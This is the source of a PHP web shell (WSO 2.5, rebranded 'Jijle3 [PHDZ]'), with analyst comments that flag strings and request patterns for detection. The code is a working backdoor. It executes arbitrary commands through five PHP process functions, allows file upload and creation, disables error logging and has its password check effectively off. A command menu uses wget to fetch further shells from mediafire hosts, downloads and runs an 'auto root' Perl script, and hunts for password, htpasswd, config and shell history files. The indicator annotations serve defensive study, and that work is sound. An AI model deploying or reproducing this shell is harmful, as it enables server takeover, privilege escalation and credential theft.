1<?php
// Emits a favicon link and an inline stylesheet as the very first output of the script.
// Analyst note: every asset referenced in this literal is loaded from a third-party
// host (www.dz-streaming.eu, i41/i43/i44.tinypic.com). These hostnames are fixed strings
// in the file, so they can serve as static indicators when scanning a web root, and
// they would also appear in the outbound traffic of any browser that renders the page.
2echo "<link rel='shortcut icon' href='http://www.dz-streaming.eu/favicon.ico'>
3 <style type='text/css'>
4 input[type=submit], input[type=button], input[type=reset]{
5 text-align:center;
6 background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
7 border:1px solid #4D4D4D;
8 color:#CCCCCC;
9 border-top-color:#565656;
10 padding:4px 6px;
11 margin:4px 5px;
12 height:16px;
13 -moz-box-shadow:0 0 1px black;
14 -webkit-box-shadow:0 0 1px black;
15 box-shadow:0 0 1px black;
16 text-shadow:0 1px black;
17 -moz-border-radius:4px;
18 -webkit-border-radius:4px;
19 -khtml-border-radius:4px;
20 border-radius:4px;
21 height:23px;
22}
23input[type=submit]:hover , input[type=button]:hover, input[type=reset]:hover{
24 background-position:center top;
25 text-decoration:none;
26}
27input[type=text], input[type=password]{
28 background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
29 border:1px solid #4D4D4D;
30 color:#CCCCCC;
31 border-top-color:#565656;
32 -moz-box-shadow:0 0 1px black;
33 -webkit-box-shadow:0 0 1px black;
34 box-shadow:0 0 1px black;
35 -moz-border-radius:4px;
36 -webkit-border-radius:4px;
37 -khtml-border-radius:4px;
38 border-radius:4px;
39 height:18px;
40 margin-left: 5px;
41}
42input , textarea , button , body , caption , table ,area , option {
43 outline:none;
44 transition: all 0.20s ease-in-out;
45 -webkit-transition: all 0.25s ease-in-out;
46 -moz-transition: all 0.25s ease-in-out;
47 border-radius:3px;
48 -webkit-border-radius:3px;
49 -moz-border-radius:3px;
50 border:1px solid rgba(0,0,0, 0.2);
51 /* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
52}
53input , textarea {
54 background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
55}
56input:focus, textarea:focus ,button:active , body:focus , caption:focus , table:focus ,area:focus ,option:focus {
57 box-shadow: 0 0 5px rgba(0, 0, 255, 1);
58 -webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
59 -moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
60 border: 1px solid #CCCC00;
61 background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
62 overflow: auto;
63/* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
64}
65body{
66/* font-family : Verdana; */
67 color : #f9f6f1;
68 font-size : 0.7em;
69 background: url(http://i44.tinypic.com/i56tc9.jpg) no-repeat center top #252525;
70}
71input , textarea {
72 outline:none;
73 transition: all 0.20s ease-in-out;
74 -webkit-transition: all 0.25s ease-in-out;
75 -moz-transition: all 0.25s ease-in-out;
76 border-radius:3px;
77 -webkit-border-radius:3px;
78 -moz-border-radius:3px;
79 border:1px solid rgba(0,0,0, 0.2);
80}
81input:focus, textarea:focus {
82 outline: 0;
83 border-color: rgba(82, 168, 236, 0.8);
84 -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
85 -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
86 box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
87 background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
88 overflow: auto;
89}
90 </style>
91 ";
92# jijle3 login
93#$auth_pass = md5('Jijle3');
94#$color = "#df5";
95#$default_action = 'Home';
96#$default_use_ajax = true;
97#$default_charset = 'Windows-1251';
98
99#if(!empty($_SERVER['HTTP_USER_AGENT'])) {
100 # $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
101 #if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
102 # header('HTTP/1.0 404 Not Found');
103 # exit;
104 # }
105#}
106
// Per-request runtime setup. Every call is prefixed with @, so a failing call is silent.
// Analyst note: the first two settings switch PHP error logging off for this request,
// which keeps the script's own warnings out of the PHP error log. They do not touch
// the web server's access log.
107@ini_set('error_log',NULL);
108@ini_set('log_errors',0);
// Remove the execution time limit (0 = unlimited), once through the ini value and once
// through set_time_limit().
109@ini_set('max_execution_time',0);
110@set_time_limit(0);
// set_magic_quotes_runtime() was removed in PHP 7.0, so this call marks the script as
// written for PHP 5.x.
111@set_magic_quotes_runtime(0);
// Version constant. The WSO_ prefix, together with the wso*/WSO* function names used
// throughout the file, is a stable string to match on.
112@define('WSO_VERSION', '2.5');
113
// Legacy-PHP compatibility: when magic_quotes_gpc is on, PHP has already added
// backslashes to request data. This block strips them again from $_POST and $_COOKIE
// so the rest of the script sees the values exactly as they were sent.
114if(get_magic_quotes_gpc()) {
// Recursively applies stripslashes() to a scalar or to every leaf of a nested array.
// Declared only when the surrounding condition is true.
115 function WSOstripslashes($array) {
116 return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
117 }
118 $_POST = WSOstripslashes($_POST);
119 $_COOKIE = WSOstripslashes($_COOKIE);
120}
121
// Prints a bare password prompt and terminates the request via die().
// The markup closes </form> and </pre> although this function opens neither; the
// literal "Password : " prompt is a fixed string in the response body.
122function wsoLogin() {
123 die("<center><span>Password : </span><input type=password name=pass><input type=submit value='Enter'></form></pre>");
124}
// Sets cookie $k to $v for the client and mirrors it into $_COOKIE, so code later in
// the same request already sees the new value.
// setcookie() is called with no expiry, path or flags, so PHP's defaults apply.
125function WSOsetcookie($k, $v) {
126 $_COOKIE[$k] = $v;
127 setcookie($k, $v);
128}
129
// Password gate, active only when $auth_pass is non-empty.
// NOTE(review): the only assignment to $auth_pass visible in this file is in a
// commented-out line above. Unless it is set elsewhere, this whole block is skipped
// and the page is served without any password check.
// When active: a POSTed `pass` whose MD5 equals $auth_pass sets a cookie named
// md5(Host header) whose value is the hash itself. Any request that lacks a matching
// cookie gets the prompt from wsoLogin() and stops there.
// Analyst note: the cookie name is a 32-character hex string derived from the Host
// header. A cookie of that shape sent to a PHP file is worth matching on in request logs.
// Both comparisons are loose (== and !=).
130if(!empty($auth_pass)) {
131 if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
132 WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
133
134 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
135 wsoLogin();
136}
137
// Environment probing that fills the globals used by the rest of the script.
// $os is 'win' when PHP_OS starts with "win" (case-insensitive), otherwise 'nix'.
138if(strtolower(substr(PHP_OS,0,3)) == "win")
139 $os = 'win';
140else
141 $os = 'nix';
142
// When safe_mode is off, all PHP error reporting is disabled for the request.
143$safe_mode = @ini_get('safe_mode');
144if(!$safe_mode)
145 error_reporting(0);
146
147$disable_functions = @ini_get('disable_functions');
// $home_cwd keeps the directory the script started in. $cwd is the directory after an
// optional chdir() to the POST field `c`, which is used as sent, without validation.
148$home_cwd = @getcwd();
149if(isset($_POST['c']))
150 @chdir($_POST['c']);
151$cwd = @getcwd();
// Normalise Windows backslashes to forward slashes and make sure $cwd ends with "/".
152if($os == 'win') {
153 $home_cwd = str_replace("\\", "/", $home_cwd);
154 $cwd = str_replace("\\", "/", $cwd);
155}
156if($cwd[strlen($cwd)-1] != '/')
157 $cwd .= '/';
158
// Default for the "<md5(Host)>ajax" cookie slot when the client did not send one.
// NOTE(review): $default_use_ajax is only assigned in a commented-out line earlier in
// this file, so this presumably evaluates to false unless it is defined elsewhere.
159if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
160 $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
161
// Builds $aliases, a "menu label => shell command" table chosen by the $os value set
// earlier. Entries with an empty command act as section headings. The code that
// consumes the table is not visible in this part of the file.
// Analyst note: most entries are read-only enumeration (accounts, network state,
// SUID/SGID and world-writable files, configuration and credential files, shell
// history). The non-Windows table also holds entries that download further archives
// from mediafire.com hosts and run a Perl script named phdz.pl. The archive names, the
// URLs and the "pass:" labels are literal strings in the file, so they work as static
// indicators, and the same command lines are worth matching in process-execution logs
// of the web-server account.
162if($os == 'win')
163 $aliases = array(
164 "List Directory" => "dir",
165 "Find index.php in current dir" => "dir /s /w /b index.php",
166 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
167 "Show active connections" => "netstat -an",
168 "Show running services" => "net start",
169 "User accounts" => "net user",
170 "Show computers" => "net view",
171 "ARP Table" => "arp -a",
172 "IP Configuration" => "ipconfig /all"
173 );
174else
175 $aliases = array(
176 "List dir" => "ls -lha",
177 "list file attributes on a Linux second extended file system" => "lsattr -va",
178 "show opened ports" => "netstat -an | grep -i listen",
179 "process status" => "ps aux",
180 "Jijle3 : Get Nother Shells"=>"",
181 "Dhanush Shell | pass:Jijle3"=>"wget http://download1582.mediafire.com/9jtscxv4qdzg/7zq2q32v02kz59j/dhanush.php.zip ; unzip dhanush.php.zip",
182 "K2ll33d Shell "=>"wget http://download1643.mediafire.com/iq7073edn7pg/3vqec9bm5krrdrj/kil223dd.php.zip ; unzip kil223dd.php.zip",
183 "1n73ction Shell | pass:1n73ction "=>"wget http://download1512.mediafire.com/m8hgk0nnrupg/954ho11nt2b48w8/1n73ction.php.zip ; unzip 1n73ction.php.zip",
184 "Cyber Shell | pass:Jijle3"=>"wget http://download1512.mediafire.com/phidtd82s8vg/q6qx0xhcd1efzd5/cyb3.php.zip ; unzip cyb3.php.zip",
185 "Jijle3 : Some Commonds"=>"",
186 "Logged in users"=>"w",
187 "Last to connect"=>"lastlog",
188 "IP Addresses"=>"cat /etc/hosts",
189 "Check MMAP"=>"cat /proc/sys/vm/mmap_min_addr",
190 "USER WITHOUT PASSWORD!"=>"cut -d: -f1,2,3 /etc/passwd | grep ::",
191 "List of Cpanel`s domains(valiases)"=>"ls -l /etc/valiases",
192 "Downloaders?)"=>"which wget curl w3m lynx",
193 "Show running proccess"=>"ps aux",
194 "Memory check"=>"cat /proc/meminfo",
195 "Get cpanel logs"=>"cat /var/cpanel/accounting.log",
196 "Jijle3 : Auto Root Commonds"=>"",
197 "First ! : GET Auto Root File [ Perl ]"=>"wget http://download944.mediafire.com/5fi1yfk5ttcg/u4seoaw7ze1dio0/phdz.pl.zip ; unzip phdz.pl.zip ; ./phdz.pl",
198 "AutoRoot [ Linux ]"=>"perl phdz.pl linux",
199 "AutoRoot [ FreeBSD ]"=>"perl phdz.pl bsd",
200 "AutoRoot [ SunOS ]"=>"perl phdz.pl sunos",
201 "Find" => "",
202 "find all suid files" => "find / -type f -perm -04000 -ls",
203 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
204 "find all sgid files" => "find / -type f -perm -02000 -ls",
205 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
206 "find config.inc.php files" => "find / -type f -name config.inc.php",
207 "find config* files" => "find / -type f -name \"config*\"",
208 "find config* files in current dir" => "find . -type f -name \"config*\"",
209 "find all writable folders and files" => "find / -perm -2 -ls",
210 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
211 "find all service.pwd files" => "find / -type f -name service.pwd",
212 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
213 "find all .htpasswd files" => "find / -type f -name .htpasswd",
214 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
215 "find all .bash_history files" => "find / -type f -name .bash_history",
216 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
217 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
218 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
219 "Locate" => "",
220 "locate httpd.conf files" => "locate httpd.conf",
221 "locate vhosts.conf files" => "locate vhosts.conf",
222 "locate proftpd.conf files" => "locate proftpd.conf",
223 "locate psybnc.conf files" => "locate psybnc.conf",
224 "locate my.conf files" => "locate my.conf",
225 "locate admin.php files" =>"locate admin.php",
226 "locate cfg.php files" => "locate cfg.php",
227 "locate conf.php files" => "locate conf.php",
228 "locate config.dat files" => "locate config.dat",
229 "locate config.php files" => "locate config.php",
230 "locate config.inc files" => "locate config.inc",
231 "locate config.inc.php" => "locate config.inc.php",
232 "locate config.default.php files" => "locate config.default.php",
233 "locate config* files " => "locate config",
234 "locate .conf files"=>"locate '.conf'",
235 "locate .pwd files" => "locate '.pwd'",
236 "locate .sql files" => "locate '.sql'",
237 "locate .htpasswd files" => "locate '.htpasswd'",
238 "locate .bash_history files" => "locate '.bash_history'",
239 "locate .mysql_history files" => "locate '.mysql_history'",
240 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
241 "locate backup files" => "locate backup",
242 "locate dump files" => "locate dump",
243 "locate priv files" => "locate priv"
244 );
245
// Prints the top of every page: <head> with inline CSS and JavaScript, a hidden POST
// form named "mf", the system-information table and the menu bar. Returns nothing.
// Reads the globals cwd, home_cwd, os, safe_mode, auth_pass, default_charset and color,
// and calls wsoViewSize() and wsoPermsColor().
//
// Analyst notes, all taken from the literals below:
//  - Navigation is a POST of the hidden form fields a, c, p1, p2, p3 and charset. The
//    AJAX path sends the same fields prefixed with "ajax=true". That field set in a
//    request body is a usable matching pattern for request logging or WAF rules.
//  - The page title is "<Host header> | Jijle3 [PHDZ]", a fixed string in responses.
//  - $_POST['charset'] and $_SERVER['HTTP_HOST'] are written into the markup without
//    escaping, while cwd, a and p1..p3 go through htmlspecialchars().
//  - The embedded processReqChange() passes part of the server response to eval().
//  - The info table links out to search sites with the php_uname() string as the query,
//    so the host's kernel string leaves the server in the viewer's browser requests.
246function wsoHeader() {
// Fall back to the configured default charset, and to '#df5' as the accent colour.
247 if(empty($_POST['charset']))
248 $_POST['charset'] = $GLOBALS['default_charset'];
249 global $color;
250 if(!$color) $color = '#df5';
251 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " | Jijle3 [PHDZ]</title>
252<style>
253body{background-color:#444;color:#e1e1e1;}
254body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
255table.info{ color:#fff;background-color:#222; }
256span,h1,a{ color: $color !important; }
257span{ font-weight: bolder; }
258h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
259div.content{ padding: 5px;margin-left:5px;background-color:#333; }
260a{ text-decoration:none; }
261a:hover{ text-decoration:underline; }
262.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
263.bigarea{ width:100%;height:250px; }
264input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
265form{ margin:0px; }
266#toolsTbl{ text-align:center; }
267.toolsInp{ width: 300px }
268.main th{text-align:left;background-color:#5e5e5e;}
269.main tr:hover{background-color:#5e5e5e}
270.l1{background-color:#444}
271pre{font-family:Courier,Monospace;}
272</style>
273<script>
274 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
275 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
276 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
277 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
278 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
279 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
280 var d = document;
281 function set(a,c,p1,p2,p3,charset) {
282 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
283 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
284 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
285 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
286 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
287 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
288 }
289 function g(a,c,p1,p2,p3,charset) {
290 set(a,c,p1,p2,p3,charset);
291 d.mf.submit();
292 }
293 function a(a,c,p1,p2,p3,charset) {
294 set(a,c,p1,p2,p3,charset);
295 var params = 'ajax=true';
296 for(i=0;i<d.mf.elements.length;i++)
297 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
298 sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
299 }
300 function sr(url, params) {
301 if (window.XMLHttpRequest)
302 req = new XMLHttpRequest();
303 else if (window.ActiveXObject)
304 req = new ActiveXObject('Microsoft.XMLHTTP');
305 if (req) {
306 req.onreadystatechange = processReqChange;
307 req.open('POST', url, true);
308 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
309 req.send(params);
310 }
311 }
312 function processReqChange() {
313 if( (req.readyState == 4) )
314 if(req.status == 200) {
315 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
316 var arr=reg.exec(req.responseText);
317 eval(arr[2].substr(0, arr[1]));
318 } else alert('Request error!');
319 }
320
321</script>
322<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
323<form method=post name=mf style='display:none;'>
324<input type=hidden name=a>
325<input type=hidden name=c>
326<input type=hidden name=p1>
327<input type=hidden name=p2>
328<input type=hidden name=p3>
329<input type=hidden name=charset>
330</form>";
// Disk usage of the current directory. A zero or failed total becomes 1 so the
// percentage computed further down cannot divide by zero.
331 $freeSpace = @diskfreespace($GLOBALS['cwd']);
332 $totalSpace = @disk_total_space($GLOBALS['cwd']);
333 $totalSpace = $totalSpace?$totalSpace:1;
334 $release = @php_uname('r');
335 $kernel = @php_uname('s');
// NOTE(review): $explink is built here but not referenced again in this function; the
// Exploit-db link in the table below builds its own URL. strpos() is called as
// strpos('Linux', $kernel), i.e. it searches for $kernel inside the literal 'Linux'.
336 $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
337 if(strpos('Linux', $kernel) !== false)
338 $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
339 else
340 $explink .= urlencode($kernel . ' ' . substr($release,0,3));
// Identity of the PHP process: effective uid/gid through the POSIX functions when they
// exist, otherwise the script owner's ids with "?" as the group name.
341 if(!function_exists('posix_getegid')) {
342 $user = @get_current_user();
343 $uid = @getmyuid();
344 $gid = @getmygid();
345 $group = "?";
346 } else {
347 $uid = @posix_getpwuid(posix_geteuid());
348 $gid = @posix_getgrgid(posix_getegid());
349 $user = $uid['name'];
350 $uid = $uid['uid'];
351 $group = $gid['name'];
352 $gid = $gid['gid'];
353 }
354
// Breadcrumb for the current directory: one link per path component, each calling
// g("FilesMan", <path up to that component>).
355 $cwd_links = '';
356 $path = explode("/", $GLOBALS['cwd']);
357 $n=count($path);
358 for($i=0; $i<$n-1; $i++) {
359 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
360 for($j=0; $j<=$i; $j++)
361 $cwd_links .= $path[$j].'/';
362 $cwd_links .= "\")'>".$path[$i]."/</a>";
363 }
364
// <option> list for the charset selector; the posted charset is pre-selected.
365 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
366 $opt_charsets = '';
367 foreach($charsets as $item)
368 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
369
// Menu: label => value posted in field `a`. "Logout" is added only when a password is
// configured; "Suicide" (SelfRemove) is always added.
370 $m = array('Home'=>'home','Sec Info'=>'SecInfo','Exec'=>'Console','Sql'=>'Sql','Baypass'=>'bypss','Forums'=>'forum','Symlink'=>'symlinker','Domain'=>'domains','Tools'=>'tools','Cgi'=>'cgi','String'=>'StringTools','Network'=>'Network','About'=>'about' );
371 if(!empty($GLOBALS['auth_pass']))
372 $m['Logout'] = 'Logout';
373 $m['Suicide'] = 'SelfRemove';
374 $menu = '';
375
376 foreach($m as $k => $v)
377 $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
// On Windows, list every drive letter from c to z that exists as a directory.
378 $drives = "";
379 if($GLOBALS['os'] == 'win') {
380 foreach(range('c','z') as $drive)
381 if(is_dir($drive.':\\'))
382 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
383 }
384 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
385 . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="http://www.exploit-db.com/search/?action=search&filter_description='.urlencode(@php_uname()).'" target="_blank">[ Exploit-db ]</a> <a href="http://www.1337day.com/search" target="_blank">[ 1337day ]</a> <a href="http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q='.urlencode(@php_uname()).'" target="_blank">[ ExploitSearch ]</a> <a href="http://www.shodanhq.com/exploits?q='.urlencode(@php_uname()).'" target="_blank">[ Shodanhq ]</a> </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' ) <span>Locals Pack :</span><a href="http://rghost.net/6YYsd7ynN" target="_blank"> [ Download ]</a></b> <br>' . @phpversion() . '<span>Safe mode:</span> '
386 . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font> ' )
387 . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ File Manager ]</a><br><br>' . $drives . '</td>'
388 . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Your IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr><br>
389</td></tr></table>'
390 . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
391}
392
393
// Prints the bottom toolbar and closes the page. Returns nothing.
// The toolbar holds six small forms: change directory, read file, make directory,
// make file, execute, and a multipart file upload. All but the upload form submit
// through the page's g() JavaScript helper instead of a normal form post.
// A "(Writeable)" / "(Not writable)" marker for the current directory is shown beside
// the three write operations.
// Analyst note: the upload form is the only one that posts directly. It is a
// multipart/form-data POST carrying a=FilesMAn, p1=uploadFile and a file field named f,
// which is a distinctive request shape. $GLOBALS['cwd'] is HTML-escaped in the
// change-directory input but written raw into the upload form's hidden field, as is
// $_POST['charset'].
394function wsoFooter() {
395 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
396 echo "
397</div>
398<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
399 <tr>
400 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
401 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
402 </tr><tr>
403 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
404 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
405 </tr><tr>
406 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
407 <td><form method='post' ENCTYPE='multipart/form-data'>
408 <input type=hidden name=a value='FilesMAn'>
409 <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
410 <input type=hidden name=p1 value='uploadFile'>
411 <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
412 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
413 </tr></table></div></body></html>";
414}
415
// Fallback stubs: when the POSIX extension's lookup functions are missing and their
// names do not appear in the disable_functions string, define replacements that always
// return false. Callers can then invoke them unconditionally and get "no data" instead
// of a fatal undefined-function error.
416if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
417 function posix_getpwuid($p) {return false;} }
418if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
419 function posix_getgrgid($p) {return false;} }
420
// Runs the command line $in and returns what it printed, as a string.
// The first available mechanism is used, in this order: exec(), passthru(), system(),
// shell_exec(), then popen() as a last resort. If none applies, '' is returned.
// $in is handed over exactly as received; no quoting or validation happens here.
// Analyst note: because five separate process-spawning APIs are tried, a PHP
// configuration that restricts only some of them presumably leaves a later branch
// usable. Hardening would need to cover the whole family. Child processes of the PHP
// or web-server worker (a shell, which, find, wget and similar) are the host-side
// trace of this function.
421function wsoEx($in) {
422 $out = '';
423 if (function_exists('exec')) {
// exec() fills $out with an array of output lines, which is joined back into one string.
424 @exec($in,$out);
425 $out = @join("\n",$out);
426 } elseif (function_exists('passthru')) {
// passthru() and system() print directly, so their output is captured by buffering.
427 ob_start();
428 @passthru($in);
429 $out = ob_get_clean();
430 } elseif (function_exists('system')) {
431 ob_start();
432 @system($in);
433 $out = ob_get_clean();
434 } elseif (function_exists('shell_exec')) {
435 $out = shell_exec($in);
436 } elseif (is_resource($f = @popen($in,"r"))) {
// Read the pipe in 1024-byte chunks until end of file.
437 $out = "";
438 while(!@feof($f))
439 $out .= fread($f,1024);
440 pclose($f);
441 }
442 return $out;
443}
444
/**
 * Formats a byte count as a short human-readable size.
 *
 * Values of at least 1024 are scaled to KB, MB or GB (powers of 1024) and printed
 * with two decimals; smaller values are returned unscaled with a " B" suffix.
 *
 * @param int|float $s Size in bytes.
 * @return string For example "1.50 KB" or "512 B".
 */
function wsoViewSize($s) {
    // Largest unit first, so the first threshold reached decides the unit.
    $scales = array(
        ' GB' => 1073741824,
        ' MB' => 1048576,
        ' KB' => 1024,
    );
    foreach ($scales as $suffix => $divisor) {
        if ($s >= $divisor) {
            return sprintf('%1.2f', $s / $divisor) . $suffix;
        }
    }
    return $s . ' B';
}
455
/**
 * Renders a numeric file mode as a ten-character string in the style of `ls -l`:
 * one file-type character followed by three read/write/execute triplets.
 *
 * @param int $p Mode bits, e.g. the return value of fileperms().
 * @return string For example "-rw-r--r--" or "drwxr-xr-x"; the type is "u" when no
 *                type mask matches.
 */
function wsoPerms($p) {
    // File-type masks, tested in this exact order; the first full match wins.
    $typeMasks = array(
        array(0xC000, 's'),
        array(0xA000, 'l'),
        array(0x8000, '-'),
        array(0x6000, 'b'),
        array(0x4000, 'd'),
        array(0x2000, 'c'),
        array(0x1000, 'p'),
    );
    $text = 'u';
    foreach ($typeMasks as $pair) {
        if (($p & $pair[0]) == $pair[0]) {
            $text = $pair[1];
            break;
        }
    }

    // Per class: read bit, write bit, execute bit, special bit, and the characters
    // shown when the special bit is set with / without the execute bit.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($classes as $bits) {
        $text .= ($p & $bits[0]) ? 'r' : '-';
        $text .= ($p & $bits[1]) ? 'w' : '-';
        $hasSpecial = ($p & $bits[3]);
        if ($p & $bits[2]) {
            $text .= $hasSpecial ? $bits[4] : 'x';
        } else {
            $text .= $hasSpecial ? $bits[5] : '-';
        }
    }
    return $text;
}
476
/**
 * Returns the permission string of a path wrapped in a coloured <font> tag:
 * #FF0000 when the path is not readable, white when it is readable but not
 * writable, #25ff00 when it is both.
 *
 * @param string $f Path to inspect.
 * @return string HTML fragment.
 */
function wsoPermsColor($f) {
    if (!@is_readable($f)) {
        $shade = '#FF0000';
    } elseif (!@is_writable($f)) {
        $shade = 'white';
    } else {
        $shade = '#25ff00';
    }
    return '<font color=' . $shade . '>' . wsoPerms(@fileperms($f)) . '</font>';
}
485
/**
 * Lists the entries of a directory.
 *
 * Uses scandir() when it exists; otherwise falls back to an opendir()/readdir() loop.
 *
 * @param string $dir Directory path.
 * @return array|false Entry names, including "." and "..".
 */
function wsoScandir($dir) {
    if (!function_exists("scandir")) {
        // Manual fallback: collect names in the order readdir() yields them.
        $handle = opendir($dir);
